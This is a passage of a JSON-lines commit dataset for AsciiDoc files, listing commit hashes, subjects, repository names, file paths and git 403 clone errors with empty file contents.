rch,winstonewert\/elasticsearch,wbowling\/elasticsearch,caengcjd\/elasticsearch,caengcjd\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,yongminxia\/elasticsearch,ouyangkongtong\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,gfyoung\/elasticsearch,lzo\/elasticsearch-1,Stacey-Gammon\/elasticsearch,infusionsoft\/elasticsearch,LewayneNaidoo\/elasticsearch,cnfire\/elasticsearch-1,mcku\/elasticsearch,YosuaMichael\/elasticsearch,MichaelLiZhou\/elasticsearch,robin13\/elasticsearch,zhiqinghuang\/elasticsearch,markwalkom\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,uschindler\/elasticsearch,iamjakob\/elasticsearch,Shekharrajak\/elasticsearch,linglaiyao1314\/elasticsearch,nrkkalyan\/elasticsearch,ivansun1010\/elasticsearch,ZTE-PaaS\/elasticsearch,rento19962\/elasticsearch,Liziyao\/elasticsearch,martinstuga\/elasticsearch,jbertouch\/elasticsearch,strapdata\/elassandra5-rc,MisterAndersen\/elasticsearch,trangvh\/elasticsearch,strapdata\/elassandra,dylan8902\/elasticsearch,tkssharma\/elasticsearch,henakamaMSFT\/elasticsearch,apepper\/elasticsearch,nellicus\/elasticsearch,zkidkid\/elasticsearch,hirdesh2008\/elasticsearch,cnfire\/elasticsearch-1,jimhooker2002\/elasticsearch,kaneshin\/elasticsearch,zhiqinghuang\/elasticsearch,masaruh\/elasticsearch,tahaemin\/elasticsearch,cwurm\/elasticsearch,springning\/elasticsearch,elancom\/elasticsearch,diendt\/elasticsearch,mgalushka\/elasticsearch,areek\/elasticsearch,apepper\/elasticsearch,awislowski\/elasticsearch,JSCooke\/elasticsearch,lzo\/elasticsearch-1,hanswang\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Rygbee\/elasticsearch,polyfractal\/elasticsearch,jango2015\/elasticsearch,vietlq\/elasticsearch,wangtuo\/elasticsearch,himanshuag\/elasticsearch,mjhennig\/elasticsearch,masterweb121\/elasticsearch,mortonsykes\/elasticsearch,iacdingping\/elasticsearch,hanswang\/elasticsearch,hanswang\/elasticsearch,LeoYao\/elasticsearch,naveenhooda2000\/elasticsearch,hirdesh2008\/elasticsearch,ckclark\/elasticsearch,alexshadow007\/elasticsearch,apepper\/elasticsearch,jeteve\/elasticsearch,vingupta3\/elasticsearch,kalimatas\/elasticsearch,ckclark\/elasticsearch,sc0ttkclark\/elasticsearch,strapdata\/elassandra5-rc,artnowo\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,brandonkearby\/elasticsearch,schonfeld\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,Charlesdong\/elasticsearch,kaneshin\/elasticsearch,Liziyao\/elasticsearch,StefanGor\/elasticsearch,ESamir\/elasticsearch,acchen97\/elasticsearch,HonzaKral\/elasticsearch,yanjunh\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,xingguang2013\/elasticsearch,fernandozhu\/elasticsearch,nilabhsagar\/elasticsearch,tebriel\/elasticsearch,MaineC\/elasticsearch,tkssharma\/elasticsearch,ESamir\/elasticsearch,tkssharma\/elasticsearch,lzo\/elasticsearch-1,girirajsharma\/elasticsearch,huanzhong\/elasticsearch,wittyameta\/elasticsearch,jpountz\/elasticsearch,qwerty4030\/elasticsearch,ulkas\/elasticsearch,ESamir\/elasticsearch,mapr\/elasticsearch,zhiqinghuang\/elasticsearch,yanjunh\/elasticsearch,F0lha\/elasticsearch,nellicus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,franklanganke\/elasticsearch,xuzha\/elasticsearch,iamjakob\/elasticsearch,kunallimaye\/elasticsearch,spiegela\/elasticsearch,jimczi\/elasticsearch,vietlq\/elasticsearch,kingaj\/elasticsearch,PhaedrusTheGreek\/elasticsearch,pranavraman\/elasticsearch,tahaemin\/elasticsearch,jpountz\/elasticsearch,socialrank\/elasticsearch,adrianbk\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ZTE-PaaS\/elasticsearch,uschindler\/elasticsearch,sdauletau\/elasticsearch,glefloch\/elasticsearch,mbrukman\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MaineC\/elasticsearch,zhiqinghuang\/elasticsearch,mortonsykes\/elasticsearch,mcku\/elasticsearch,umeshdangat\/elasticsearch,avikurapati\/elasticsearch,ricardocerq\/elasticsearch,myelin\/elasticsearch,jeteve\/elasticsearch,scottsom\/elasticsearch,mnylen\/elasticsearch,markwalkom\/elasticsearch,polyfractal\/elasticsearch,glefloch\/elasticsearch,mmaracic\/elasticsearch,kingaj\/elasticsearch,masterweb121\/elasticsearch,adrianbk\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra5-rc,btiernay\/elasticsearch,JSCooke\/elasticsearch,hafkensite\/elasticsearch,yuy168\/elasticsearch,mbrukman\/elasticsearch,iantruslove\/elasticsearch,myelin\/elasticsearch,kenshin233\/elasticsearch,hafkensite\/elasticsearch,yynil\/elasticsearch,Brijeshrpatel9\/elasticsearch,rajanm\/elasticsearch,Collaborne\/elasticsearch,Siddartha07\/elasticsearch,LewayneNaidoo\/elasticsearch,mnylen\/elasticsearch,jpountz\/elasticsearch,shreejay\/elasticsearch,yynil\/elasticsearch,hanswang\/elasticsearch,Brijeshrpatel9\/elasticsearch,lydonchandra\/elasticsearch,bawse\/elasticsearch,Siddartha07\/elasticsearch,linglaiyao1314\/elasticsearch,beiske\/elasticsearch,kunallimaye\/elasticsearch,fekaputra\/elasticsearch,LeoYao\/elasticsearch,ImpressTV\/elasticsearch,mm0\/elasticsearch,zkidkid\/elasticsearch,karthikjaps\/elasticsearch,jimczi\/elasticsearch,Helen-Zhao\/elasticsearch,tebriel\/elasticsearch,strapdata\/elassandra-test,springning\/elasticsearch,socialrank\/elasticsearch,C-Bish\/elasticsearch,kingaj\/elasticsearch,a2lin\/elasticsearch,karthikjaps\/elasticsearch,kingaj\/elasticsearch,mbrukman\/elasticsearch,Widen\/elasticsearch,mcku\/elasticsearch,Rygbee\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,yongminxia\/elasticsearch,ivansun1010\/elasticsearch,truemped\/elasticsearch,winstonewert\/elasticsearch,schonfeld\/elasticsearch,likaiwalkman\/elasticsearch,beiske\/elasticsearch,IanvsPoplicola\/elasticsearch,mmaracic\/elasticsearch,gingerwizard\/elasticsearch,rmuir\/elasticsearch,iamjakob\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,markwalkom\/elasticsearch,dpursehouse\/elasticsearch,amit-shar\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,myelin\/elasticsearch,F0lha\/elasticsearch,Uiho\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,henakamaMSFT\/elasticsearch,PhaedrusTheGreek\/elasticsearch,xuzha\/elasticsearch,mapr\/elasticsearch,hydro2k\/elasticsearch,yongminxia\/elasticsearch,sc0ttkclark\/elasticsearch,sneivandt\/elasticsearch,andrestc\/elasticsearch,lzo\/elasticsearch-1,nrkkalyan\/elasticsearch,mbrukman\/elasticsearch,areek\/elasticsearch,ulkas\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,petabytedata\/elasticsearch,fred84\/elasticsearch,nellicus\/elasticsearch,YosuaMichael\/elasticsearch,truemped\/elasticsearch,rento19962\/elasticsearch,nknize\/elasticsearch,obourgain\/elasticsearch,weipinghe\/elasticsearch,truemped\/elasticsearch,Rygbee\/elasticsearch,dongjoon-hyun\/elasticsearch,sc0ttkclark\/elasticsearch,queirozfcom\/elasticsearch,JSCooke\/elasticsearch,martinstuga\/elasticsearch,sarwarbhuiyan\/elasticsearch,dpursehouse\/elasticsearch,naveenhooda2000\/elasticsearch,andrejserafim\/elasticsearch,sarwarbhuiyan\/elasticsearch,tsohil\/elasticsearch,fekaputra\/elasticsearch,jimhooker2002\/elasticsearch,drewr\/elasticsearch,slavau\/elasticsearch,18098924759\/elasticsearch,Uiho\/elasticsearch,queirozfcom\/elasticsearch,himanshuag\/elasticsearch,sposam\/elasticsearch,Liziyao\/elasticsearch,franklanganke\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,uschindler\/elasticsearch,iamjakob\/elasticsearch,jango2015\/elasticsearch,Shepard1212\/elasticsearch,Charlesdong\/elasticsearch,kaneshin\/elasticsearch,mcku\/elasticsearch,beiske\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,wittyameta\/elasticsearch,mikemccand\/elasticsearch,xingguang2013\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,a2lin\/elasticsearch,jimczi\/elasticsearch,franklanganke\/elasticsearch,tkssharma\/elasticsearch,jimhooker2002\/elasticsearch,episerver\/elasticsearch,s1monw\/elasticsearch,kunallimaye\/elasticsearch,wenpos\/elasticsearch,nomoa\/elasticsearch,ckclark\/elasticsearch,abibell\/elasticsearch,kalimatas\/elasticsearch,Ansh90\/elasticsearch,palecur\/elasticsearch,jchampion\/elasticsearch,caengcjd\/elasticsearch,JackyMai\/elasticsearch,yongminxia\/elasticsearch,henakamaMSFT\/elasticsearch,iantruslove\/elasticsearch,djschny\/elasticsearch,iamjakob\/elasticsearch,beiske\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,coding0011\/elasticsearch,queirozfcom\/elasticsearch,bestwpw\/elasticsearch,geidies\/elasticsearch,brandonkearby\/elasticsearch,nomoa\/elasticsearch,cnfire\/elasticsearch-1,lmtwga\/elasticsearch,Ansh90\/elasticsearch,wimvds\/elasticsearch,mm0\/elasticsearch,TonyChai24\/ESSource,tebriel\/elasticsearch,MetSystem\/elasticsearch,truemped\/elasticsearch,avikurapati\/elasticsearch,yuy168\/elasticsearch,Shekharrajak\/elasticsearch,snikch\/elasticsearch,KimTaehee\/elasticsearch,nazarewk\/elasticsearch,18098924759\/elasticsearch,drewr\/elasticsearch,slavau\/elasticsearch,dongjoon-hyun\/elasticsearch,Collaborne\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,fekaputra\/elasticsearch,rhoml\/elasticsearch,hydro2k\/elasticsearch,palecur\/elasticsearch,achow\/elasticsearch,vroyer\/elasticassandra,Brijeshrpatel9\/elasticsearch,fforbeck\/elasticsearch,strapdata\/elassandra-test,infusionsoft\/elasticsearch,myelin\/elasticsearch,karthikjaps\/elasticsearch,hydro2k\/elasticsearch,cnfire\/elasticsearch-1,sarwarbhuiyan\/elasticsearch,hafkensite\/elasticsearch,kalburgimanjunath\/elasticsearch,martinstuga\/elasticsearch,sarwarbhuiyan\/elasticsearch,snikch\/elasticsearch,MjAbuz\/elasticsearch,iamjakob\/elasticsearch,mgalushka\/elasticsearch,lydonchandra\/elasticsearch,sreeramjayan\/elasticsearch,pritishppai\/elasticsearch,himanshuag\/elasticsearch,wuranbo\/elasticsearch,mapr\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,caengcjd\/elasticsearch,sneivandt\/elasticsearch,tkssharma\/elasticsearch,bawse\/elasticsearch,mortonsykes\/elasticsearch,btiernay\/elasticsearch,cnfire\/elasticsearch-1,bawse\/elasticsearch,gmarz\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,onegambler\/elasticsearch,ESamir\/elasticsearch,jango2015\/elasticsearch,pritishppai\/elasticsearch,MichaelLiZhou\/elasticsearch,pablocastro\/elasticsearch,pozhidaevak\/elasticsearch,18098924759\/elasticsearch,kenshin233\/elasticsearch,tahaemin\/elasticsearch,wbowling\/elasticsearch,rlugojr\/elasticsearch,sreeramjayan\/elasticsearch,Siddartha07\/elasticsearch,jango2015\/elasticsearch,F0lha\/elasticsearch,gfyoung\/elasticsearch,abibell\/elasticsearch,dylan8902\/elasticsearch,nezirus\/elasticsearch,mcku\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,StefanGor\/elasticsearch,fekaputra\/elasticsearch,JervyShi\/elasticsearch,mnylen\/elasticsearch,davidvgalbraith\/elasticsearch,beiske\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,yuy168\/elasticsearch,geidies\/elasticsearch,iacdingping\/elasticsearch,IanvsPoplicola\/elasticsearch,nomoa\/elasticsearch,mjhennig\/elasticsearch,StefanGor\/elasticsearch,Helen-Zhao\/elasticsearch,petabytedata\/elasticsearch,cnfire\/elasticsearch-1,caengcjd\/elasticsearch,ricardocerq\/elasticsearch,lightslife\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,springning\/elasticsearch,MjAbuz\/elasticsearch,Stacey-Gammon\/elasticsearch,ckclark\/elasticsearch,polyfractal\/elasticsearch,artnowo\/elasticsearch,franklanganke\/elasticsearch,hanswang\/elasticsearch,jbertouch\/elasticsearch,nezirus\/elasticsearch,zhiqinghuang\/elasticsearch,episerver\/elasticsearch,dongjoon-hyun\/elasticsearch,lightslife\/elasticsearch,AndreKR\/elasticsearch,kaneshin\/elasticsearch,huanzhong\/elasticsearch,davidvgalbraith\/elasticsearch,bestwpw\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,tsohil\/elasticsearch,pritishppai\/elasticsearch,alexshadow007\/elasticsearch,jbertouch\/elasticsearch,elancom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elancom\/elasticsearch,F0lha\/elasticsearch,petabytedata\/elasticsearch,sreeramjayan\/elasticsearch,TonyChai24\/ESSource,infusionsoft\/elasticsearch,MjAbuz\/elasticsearch,awislowski\/elasticsearch,njlawton\/elasticsearch,acchen97\/elasticsearch,fernandozhu\/elasticsearch,jpountz\/elasticsearch,vroyer\/elassandra,petabytedata\/elasticsearch,s1monw\/elasticsearch,snikch\/elasticsearch,yynil\/elasticsearch,areek\/elasticsearch,HonzaKral\/elasticsearch,Brijeshrpatel9\/elasticsearch,nazarewk\/elasticsearch,xingguang2013\/elasticsearch,MisterAndersen\/elasticsearch,brandonkearby\/elasticsearch,Charlesdong\/elasticsearch,MjAbuz\/elasticsearch,rmuir\/elasticsearch,avikurapati\/elasticsearch,rlugojr\/elasticsearch,jprante\/elasticsearch,mgalushka\/elasticsearch,coding0011\/elasticsearch,awislowski\/elasticsearch,lmtwga\/elasticsearch,TonyChai24\/ESSource,markwalkom\/elasticsearch,jango2015\/elasticsearch,linglaiyao1314\/elasticsearch,naveenhooda2000\/elasticsearch,areek\/elasticsearch,iacdingping\/elasticsearch,tsohil\/elasticsearch,Collaborne\/elasticsearch,davidvgalbraith\/elasticsearch,YosuaMichael\/elasticsearch,sarwarbhuiyan\/elasticsearch,brandonkearby\/elasticsearch,mjhennig\/elasticsearch,martinstuga\/elasticsearch,cwurm\/elasticsearch,djschny\/elasticsearch,andrestc\/elasticsearch,masaruh\/elasticsearch,queirozfcom\/elasticsearch,MisterAndersen\/elasticsearch,lightslife\/elasticsearch,kunallimaye\/elasticsearch,rento19962\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ivansun1010\/elasticsearch,pranavraman\/elasticsearch,camilojd\/elasticsearch,markharwood\/elasticsearch,bestwpw\/elasticsearch,artnowo\/elasticsearch,andrejserafim\/elasticsearch,Ansh90\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,rhoml\/elasticsearch,jchampion\/elasticsearch,lightslife\/elasticsearch,slavau\/elasticsearch,robin13\/elasticsearch,xingguang2013\/elasticsearch,lightslife\/elasticsearch,a2lin\/elasticsearch,kalburgimanjunath\/elasticsearch,18098924759\/elasticsearch,trangvh\/elasticsearch,jango2015\/elasticsearch,mikemccand\/elasticsearch,jprante\/elasticsearch,naveenhooda2000\/elasticsearch,mortonsykes\/elasticsearch,onegambler\/elasticsearch,tsohil\/elasticsearch,maddin2016\/elasticsearch,wbowling\/elasticsearch,wbowling\/elasticsearch,tahaemin\/elasticsearch,strapdata\/elassandra-test,infusionsoft\/elasticsearch,onegambler\/elasticsearch,wenpos\/elasticsearch,LeoYao\/elasticsearch,achow\/elasticsearch,Helen-Zhao\/elasticsearch,nrkkalyan\/elasticsearch,shreejay\/elasticsearch,rmuir\/elasticsearch,clintongormley\/elasticsearch,masterweb121\/elasticsearch,ckclark\/elasticsearch,Uiho\/elasticsearch,MjAbuz\/elasticsearch,bestwpw\/elasticsearch,ulkas\/elasticsearch,pablocastro\/elasticsearch,obourgain\/elasticsearch,linglaiyao1314\/elasticsearch,scottsom\/elasticsearch,sreeramjayan\/elasticsearch,fernandozhu\/elasticsearch,jprante\/elasticsearch,Shekharrajak\/elasticsearch,JervyShi\/elasticsearch,kunallimaye\/elasticsearch,rmuir\/elasticsearch,girirajsharma\/elasticsearch,hanswang\/elasticsearch,schonfeld\/elasticsearch,strapdata\/elassandra-test,nilabhsagar\/elasticsearch,LewayneNaidoo\/elasticsearch,xingguang2013\/elasticsearch,lydonchandra\/elasticsearch,martinstuga\/elasticsearch,huanzhong\/elasticsearch,himanshuag\/elasticsearch,PhaedrusTheGreek\/elasticsearch,karthikjaps\/elasticsearch,infusionsoft\/elasticsearch,Shekharrajak\/elasticsearch,Stacey-Gammon\/elasticsearch,onegambler\/elasticsearch,AndreKR\/elasticsearch,drewr\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,bestwpw\/elasticsearch,mnylen\/elasticsearch,mm0\/elasticsearch,jeteve\/elasticsearch,yynil\/elasticsearch,himanshuag\/elasticsearch,kenshin233\/elasticsearch,spiegela\/elasticsearch,camilojd\/elasticsearch,linglaiyao1314\/elasticsearch","old_file":"docs\/reference\/mapping\/fields.asciidoc","new_file":"docs\/reference\/mapping\/fields.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a98805f85eef22d351088765921cbc02676a307","subject":"Fixing repository-hdfs link (#878)","message":"Fixing repository-hdfs link (#878)\n\nFixing the repository-hdfs link as its now in ES proper","repos":"xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"591930aeb26628c221a8e791f2b115956de92501","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57644b90723d86f4cc286caa5a673267c78beeb8","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ba8882738511ff98f87a8c60f9adf106e24738c","subject":"Added Rafael and Ron as new members","message":"Added Rafael and Ron as new members\n","repos":"struberg\/deltaspike,danielsoro\/deltaspike,apache\/deltaspike,subaochen\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,danielsoro\/deltaspike,os890\/deltaspike-vote,rdicroce\/deltaspike,apache\/deltaspike,idontgotit\/deltaspike,chkal\/deltaspike,Danny02\/deltaspike,rdicroce\/deltaspike,Danny02\/deltaspike,struberg\/deltaspike,rdicroce\/deltaspike,idontgotit\/deltaspike,os890\/DS_Discuss,Danny02\/deltaspike,Danny02\/deltaspike,os890\/DS_Discuss,mlachat\/deltaspike,chkal\/deltaspike,subaochen\/deltaspike,os890\/deltaspike-vote,subaochen\/deltaspike,struberg\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,chkal\/deltaspike,os890\/deltaspike-vote,os890\/DS_Discuss,mlachat\/deltaspike,apache\/deltaspike,apache\/deltaspike,danielsoro\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,danielsoro\/deltaspike,os890\/DS_Discuss,idontgotit\/deltaspike","old_file":"site\/src\/main\/asciidoc\/news.adoc","new_file":"site\/src\/main\/asciidoc\/news.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c84f2375adcaf817854e07724d2109340c01b08","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d99ea34953e76ec2f23e79bc80b3362c1e7ad6b","subject":"Ex init","message":"Ex init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Rest client Ex.adoc","new_file":"Rest client Ex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b5dae337acd0b403b58b979165658b1a6da79b0","subject":"contacts api code samples","message":"contacts api code samples\n","repos":"CallFire\/callfire-api-1.1-client-java","old_file":"docs\/api\/contacts\/ContactsApi.adoc","new_file":"docs\/api\/contacts\/ContactsApi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CallFire\/callfire-api-1.1-client-java.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90b3a18d3ff770a5ba18ad8764b53a39fb30f46b","subject":"Update 2015-11-10-Install-Theano-to-Ubuntu-1404-x64.adoc","message":"Update 2015-11-10-Install-Theano-to-Ubuntu-1404-x64.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Install-Theano-to-Ubuntu-1404-x64.adoc","new_file":"_posts\/2015-11-10-Install-Theano-to-Ubuntu-1404-x64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gajumaru4444\/gajumaru4444.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32103d4f7463797c24087305866a5b4af609660e","subject":"y2b create post Unboxing The New $5000 MacBook Pro","message":"y2b create post Unboxing The New $5000 MacBook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-04-Unboxing-The-New-5000-MacBook-Pro.adoc","new_file":"_posts\/2016-12-04-Unboxing-The-New-5000-MacBook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2238c948d84409585216dea948eef8bd3e9670a9","subject":"Introduce int","message":"Introduce int\n","repos":"lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12310_cli_prebuild_handle_parse_errors\/12310_cli_prebuild_handle_parse_errors.int.adoc","new_file":"doc-bridgepoint\/notes\/12310_cli_prebuild_handle_parse_errors\/12310_cli_prebuild_handle_parse_errors.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f25b1194717f4889610921e22ba9eb281671a4d","subject":"y2b create post Xzibit Shows Off Monster's T1 Gaming Headset \\\/ Headphones","message":"y2b create post Xzibit Shows Off Monster's T1 Gaming Headset \\\/ Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-11-Xzibit-Shows-Off-Monsters-T1-Gaming-Headset--Headphones.adoc","new_file":"_posts\/2012-01-11-Xzibit-Shows-Off-Monsters-T1-Gaming-Headset--Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ef9b655f83de153075f6566721d5417368785bc","subject":"Deleted 2016-6-26-first-title.adoc","message":"Deleted 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91c927a6d740a8f359005533e906bb481d4090e5","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd529c1c3cc6ffa7135090154574dd7636de44a4","subject":"Update 2013-04-26-The-bus.adoc","message":"Update 2013-04-26-The-bus.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-04-26-The-bus.adoc","new_file":"_posts\/2013-04-26-The-bus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f619a75ea412dc509b4fd861b161b61395ff88ee","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e7ed5917855e51897e669229fadc9d8a6f8efdf","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 